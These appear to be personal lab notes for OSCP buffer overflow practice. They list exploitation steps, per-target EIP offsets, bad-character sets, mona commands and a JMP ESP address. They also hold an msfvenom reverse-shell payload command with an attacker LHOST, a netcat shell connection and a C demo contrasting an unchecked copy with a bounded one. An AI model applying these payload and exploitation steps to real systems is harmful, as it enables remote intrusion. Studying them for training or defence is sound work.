Practice stack-based buffer overflows!
This is a simple write-up; there will be no screenshots, flags, etc.
Steps involved in a buffer overflow
- Find the IP, port and the message format the service expects
- Fuzz the input and find the crash point
- Create a pattern: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l size_of_crash
- Send the created pattern and read the value in EIP at the crash
- Find the offset from EIP: /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q EIP
- Control EIP => "A" * offset + "B" * 4 + "C" * (buff_size - len(buff))
- Find a JMP ESP in an executable module => kernel32.dll || user32.dll || shell32.dll
- Find the address of the JMP ESP instruction
- Find bad characters
- Find (generate) the payload
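As an added illustration (not part of the original notes), the C program below models the bug class the steps above target: a fixed-size stack buffer filled by an unchecked copy, with the saved return address sitting a fixed distance past it. A struct stands in for a 32-bit frame so the overwrite can be shown deterministically inside memory the program owns, and the bounded version of the same handler sits beside it. BUF_SIZE, the frame layout, the LEGIT_RET value and all function names are constructed assumptions for this demo, not values from the exercises.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed size for illustration; the OVERFLOW targets in the notes had
   far larger distances (1978, 634, ...) between the buffer and EIP. */
#define BUF_SIZE 64

/* Stand-in for one 32-bit stack frame, laid out as a struct so the overwrite
   happens inside an object we own instead of on the real stack.
   Order mirrors a typical frame: local buffer, saved frame pointer, return
   address. The "offset" from the notes is offsetof(ret_addr) = 68 here. */
struct fake_frame {
    uint8_t  buf[BUF_SIZE];
    uint32_t saved_fp;
    uint32_t ret_addr;
};

#define LEGIT_RET 0x08041234u   /* constructed placeholder return address */

/* Vulnerable pattern: copies a caller-controlled number of bytes into the
   fixed buffer with no check against BUF_SIZE. Returns whatever ended up in
   the return-address slot, so the effect of an oversized input is visible.
   The single clamp to sizeof frame keeps this demo defined behaviour; the
   real bug has no clamp at all. */
uint32_t vulnerable_copy(const uint8_t *input, size_t len)
{
    struct fake_frame frame;
    memset(&frame, 0, sizeof frame);
    frame.ret_addr = LEGIT_RET;
    if (len > sizeof frame)
        len = sizeof frame;
    memcpy((uint8_t *)&frame, input, len);   /* buf is at offset 0 */
    return frame.ret_addr;
}

/* Hardened form: validate the length before touching the buffer.
   Returns 0 when the input fits, -1 when it was rejected (nothing copied). */
int bounded_copy(const uint8_t *input, size_t len)
{
    struct fake_frame frame;
    memset(&frame, 0, sizeof frame);
    frame.ret_addr = LEGIT_RET;
    if (len > sizeof frame.buf)
        return -1;
    memcpy(frame.buf, input, len);
    return (frame.ret_addr == LEGIT_RET) ? 0 : -2;  /* -2 would mean the check failed */
}

/* Builds the "A" * offset + "B" * 4 layout from the notes. Returns the number
   of bytes written, or 0 if the output buffer is too small. */
size_t build_probe(uint8_t *out, size_t out_size, size_t offset)
{
    if (offset + 4 > out_size)
        return 0;
    memset(out, 'A', offset);
    memset(out + offset, 'B', 4);
    return offset + 4;
}

/* Feed the probe to both handlers: the vulnerable one reports 0x42424242
   ("BBBB") in the return-address slot, the bounded one rejects the input. */
uint32_t demo_overwrite(void)
{
    uint8_t probe[sizeof(struct fake_frame)];
    size_t n = build_probe(probe, sizeof probe, offsetof(struct fake_frame, ret_addr));
    return vulnerable_copy(probe, n);
}

int demo_rejected(void)
{
    uint8_t probe[sizeof(struct fake_frame)];
    size_t n = build_probe(probe, sizeof probe, offsetof(struct fake_frame, ret_addr));
    return bounded_copy(probe, n);
}

int main(void)
{
    printf("offset to ret_addr: %zu\n", offsetof(struct fake_frame, ret_addr));
    printf("vulnerable_copy -> ret_addr = 0x%08x\n", demo_overwrite());
    printf("bounded_copy    -> rc = %d\n", demo_rejected());
    return 0;
}
```

The point of the model is that the "offset" found with pattern_create / pattern_offset in the notes is nothing more than offsetof(ret_addr) for the real frame, and that a length check placed before the copy (the bounded_copy form) is what removes the whole class of bug, independent of which bytes turn out to be bad characters.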
OSCP buffer overflow task
10 OVERFLOW applications in total
Login via xfreerdp: xfreerdp /v:10.10.17.30 /u:admin /p:password
IP: 10.10.17.30
OSCP_BF_1 =>
{
1. Find crash point => 2000
2. Find offset => 1978
3. Find bad chars => "\x00\x07\x2e\xa0"
4. Find JMP ESP => 625011AF => "\xaf\x11\x50\x62"
5. Payload => msfvenom -p windows/shell_reverse_tcp LHOST=192.168.135.128 LPORT=1234 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f c
}
OSCP_BF_2
{
Send the same input with the "OVERFLOW2 " command
1. Find crash at 1000
2. Find offset 634
3. Bad characters
}
OSCP_BF_3
{
1. Offset 634
2. Bad chars => \x00\x23\x3c\x83\xba
!mona config -set workingfolder c:\mona\%p
!mona bytearray -b "\x00"
!mona compare -f C:\mona\oscp\bytearray.bin -a esp
}
OSCP_BF_4
{
1. Find offset 1274
2. Find bad chars => \x00\x11\x40\x5f\xb8\xee
!mona bytearray -b "\x00"
!mona compare -f C:\mona\oscp\bytearray.bin -a 010EFA18
}
OSCP_BF_5
{
1. Offset 2026
2. Bad chars => \x00\xa9\xcd\xd4
!mona bytearray -b "\x00"
!mona compare -f C:\mona\oscp\bytearray.bin -a 009AFA18
}
OSCP_BF_6
{
Offset 314
Bad chars => \x00\x16\x2f\xf4\xfd
!mona bytearray -b "\x00"
!mona compare -f C:\mona\oscp\bytearray.bin -a 00AFFA18
}
OSCP_BF_7
{
Offset 1034
badchar=> \x00\x08\x2c\xad ae
!mona bytearray -b "\x00"
!mona compare -f C:\mona\oscp\bytearray.bin -a 0096FA18
}
OSCP_BF_8
{
Offset 1306
Bad chars => \x00\x8c\xae\xbe\xfb
!mona bytearray -b "\x00"
!mona compare -f C:\mona\oscp\bytearray.bin -a 0094FA18
}
OSCP_BF_9
{
1. Offset 1786
badchar=> \x00\x1d\x2e\xc7\xee ef
!mona bytearray -b "\x00"
!mona compare -f C:\mona\oscp\bytearray.bin -a 0109FA18
}
OSCP_BF_10
{
1. Offset 1514
2. Bad chars => \x00\x04\x3e\xe1\xe2
!mona bytearray -b "\x00"
!mona compare -f C:\mona\oscp\bytearray.bin -a 010EFA18
}
OSCP_BF_11
{
1. Offset 537
2. Bad chars => \x00\xa0\xad\xbe\xde\xef
!mona bytearray -b "\x00"
!mona compare -f C:\mona\oscp\bytearray.bin -a 010AFA18
}
Connect to the shell: nc 10.10.17.30 1337